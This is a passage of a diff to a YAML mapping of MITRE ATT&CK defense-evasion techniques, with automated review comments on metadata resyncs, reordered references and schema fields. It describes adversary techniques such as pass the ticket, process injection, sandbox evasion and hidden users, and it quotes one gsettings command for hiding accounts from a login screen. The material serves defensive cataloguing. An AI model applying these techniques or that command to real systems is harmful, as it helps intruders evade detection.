@@ -7082,14 +7199,13 @@ defense-evasion:
external_id: T1070
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -7109,6 +7225,7 @@ defense-evasion:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -7116,7 +7233,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -7132,34 +7248,35 @@ defense-evasion:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1036.004:
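Review bot: the T1550.003 `external_references` list is reordered (CERT-EU moved to the top, ADSecurity and GentilKiwi moved down), which inflates the hunk; the one substantive change is the GentilKiwi Pass the Ticket link moving to a web.archive.org snapshot of `blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos` with `Retrieved September 12, 2024`, matching this object's new `modified` date. Replacing a dead source with an archive snapshot and refreshing the retrieved date is the right pattern; the Mandiant entry for T1578.003 earlier in this diff should follow it.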
@@ -7225,7 +7342,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.004
atomic_tests: []
T1055.004:
@@ -7264,7 +7380,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -7313,8 +7429,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1647:
@@ -7365,7 +7479,7 @@ defense-evasion:
pairs to insert environment variables, such as LSEnvironment
,
to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
wardle chp2 persistence)(Citation: eset_osx_flashback)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T22:00:33.375Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Plist File Modification
x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -7386,7 +7500,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1647
atomic_tests: []
T1553.005:
@@ -7453,7 +7566,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.005
atomic_tests: []
T1600.002:
@@ -7476,7 +7588,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:48.503Z'
name: Disable Crypto Hardware
description: |-
Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -7497,8 +7609,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542:
technique:
@@ -7559,11 +7669,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1612:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:22:09.807Z'
name: Build Image on Host
description: "Adversaries may build a container image directly on a host to
bypass defenses that monitor for the retrieval of malicious images from a
@@ -7628,7 +7737,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1612
atomic_tests: []
T1055.002:
@@ -7652,7 +7760,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -7696,8 +7804,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1218.012:
@@ -7753,7 +7859,7 @@ defense-evasion:
not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
Nick Tyrer GitHub) "
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:35:28.221Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Verclsid
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -7777,7 +7883,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.010:
technique:
@@ -7868,40 +7973,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.010
atomic_tests: []
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
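Review bot: as with T1578.003, this hunk deletes the leading keys of T1497 (platforms, domains, contributors, object_marking_refs, id, type, created, created_by_ref, external_references) as part of a reorder, and the following hunks re-add contributors, domains, is_subtechnique, platforms and the references, so review both ends together. The observable differences are `x_mitre_is_subtechnique: false` and `x_mitre_modified_by_ref` changing position and the new `revoked: false` and `x_mitre_deprecated: false` keys, consistent with the other 3.2.0-era re-exports in this diff.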
@@ -7913,6 +7989,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -7923,8 +8003,14 @@ defense-evasion:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -7934,9 +8020,28 @@ defense-evasion:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1218.005:
technique:
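Review bot: the Deloitte Environment Awareness URL now carries an `/edit` suffix (`url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit`) where the removed entry had none; for a Google Drive link that form can behave differently for readers without edit rights, so confirm it opens anonymously or keep the unsuffixed form the old entry used. The same suffixed URL is used in the T1497.002 entry further down, so whichever form is chosen should be applied to both.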
@@ -7989,7 +8094,7 @@ defense-evasion:
- source_name: LOLBAS Mshta
url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T20:38:28.802Z'
name: 'Signed Binary Proxy Execution: Mshta'
description: "Adversaries may abuse mshta.exe to proxy execution of malicious
.hta files and Javascript or VBScript through a trusted Windows utility. There
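Review bot: `modified` moves backwards here (2022-05-11T14:00:00.188Z to 2022-03-11T20:38:28.802Z), and the same happens in most other `modified` changes in this diff. Every removed value shares the 14:00:00.188Z fraction, which looks like a locally generated bulk timestamp, while the new values have distinct fractions consistent with the upstream STIX objects; a line in the PR description saying these are being resynced to upstream values would stop a reader from taking the earlier date for a regression.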
@@ -8027,68 +8132,72 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.005
atomic_tests: []
T1480:
technique:
+ modified: '2024-06-07T14:30:23.491Z'
+ name: Execution Guardrails
+ description: |-
+ Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+ Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+ Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Nick Carr, Mandiant
+ x_mitre_deprecated: false
+ x_mitre_detection: Detecting the use of guardrails may be difficult depending
+ on the implementation. Monitoring for suspicious processes being spawned that
+ gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+ especially in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Nick Carr, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host Forensic Analysis
+ - Signature-based Detection
+ - Static File Analysis
type: attack-pattern
id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
created: '2019-01-31T02:10:08.261Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1480
url: https://attack.mitre.org/techniques/T1480
+ external_id: T1480
- source_name: FireEye Outlook Dec 2019
- url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
June 23, 2020.'
+ url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+ - source_name: Trellix-Qakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved June 7, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: FireEye Kevin Mandia Guardrails
- url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
U.S. malware is more restrained than adversaries'. Retrieved January 17,
2019.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
- Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Execution Guardrails
- x_mitre_detection: Detecting the use of guardrails may be difficult depending
- on the implementation. Monitoring for suspicious processes being spawned that
- gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
- especially in a short period of time, may aid in detection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Command: Command Execution'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host Forensic Analysis
- - Signature-based Detection
- - Static File Analysis
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.001:
technique:
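Review bot: a substantive content change is buried inside what is otherwise a key reorder for T1480: the description gains a third paragraph on user-agent based guardrails ending in `(Citation: Trellix-Qakbot)`, a matching `Trellix-Qakbot` entry is added to external_references, and `x_mitre_version` goes from '1.1' to '1.2'. The citation resolves and the version bump is appropriate, but call this out in the commit message so it is not lost among the moved lines; the rest of the hunk (field order, `revoked: false`, `x_mitre_attack_spec_version` 2.1.0 to 3.2.0, the `url` lines moving below their `description`) is mechanical.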
@@ -8146,7 +8255,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1205.001:
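Review bot: `spec_version: '2.1'` is removed from this technique object, and the same removal recurs on every technique in this diff with no replacement. In STIX 2.1 `spec_version` is a required common property on domain objects, so if anything downstream parses these technique mappings as STIX 2.1 this is a schema regression; if the field is dropped because the regenerated source data no longer carries it, state that in the PR, otherwise keep it next to the `x_mitre_attack_spec_version: 3.2.0` bump.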
@@ -8172,7 +8280,7 @@ defense-evasion:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -8197,8 +8305,6 @@ defense-evasion:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.012:
technique:
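Review bot: unlike the T1497 and T1480 entries, which replace `x_mitre_attack_spec_version: 2.1.0` with 3.2.0, this hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1205.001 and no replacement is visible; the context lines above (`x_mitre_permissions_required`, `- User`) do not show the field either. Confirm the entry still carries an attack spec version elsewhere in its mapping, otherwise T1205.001 ends up without one. The same check applies to the T1574.013, T1542.004 and T1601 hunks further down, which remove the field the same way.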
@@ -8259,7 +8365,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.002:
technique:
@@ -8332,7 +8437,7 @@ defense-evasion:
sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true
).(Citation:
Hide GDM User Accounts) Display Managers are not anchored to specific distributions
and may be changed by a user or adversary."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T02:31:01.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Hide Artifacts: Hidden Users'
x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -8361,7 +8466,6 @@ defense-evasion:
- 'User Account: User Account Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.002
atomic_tests: []
T1134.003:
@@ -8425,11 +8529,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.940Z'
name: 'Impair Defenses: Impair Command History Logging'
description: "Adversaries may impair command history logging to hide commands
they run on a compromised system. Various command interpreters keep track
@@ -8514,12 +8617,11 @@ defense-evasion:
url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1562.003
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -8594,45 +8696,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
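Review bot: nothing is lost in the T1497.002 removal: all five references (mitre-attack, Deloitte Environment Awareness, Sans Virtual Jan 2016, Unit 42 Sofacy Nov 2018, FireEye FIN7 April 2017) reappear in the `@@ -8678,8 +8753,35 @@` hunk, now with `source_name` consistently first (the removed FireEye FIN7 entry had it last, after `url` and `description`). As with T1497, `modified` moves to 2024-09-12 while `x_mitre_version` stays at '1.1' in the later context, so this is a metadata resync rather than a content change.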
@@ -8656,6 +8723,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -8666,9 +8736,14 @@ defense-evasion:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -8678,8 +8753,35 @@ defense-evasion:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
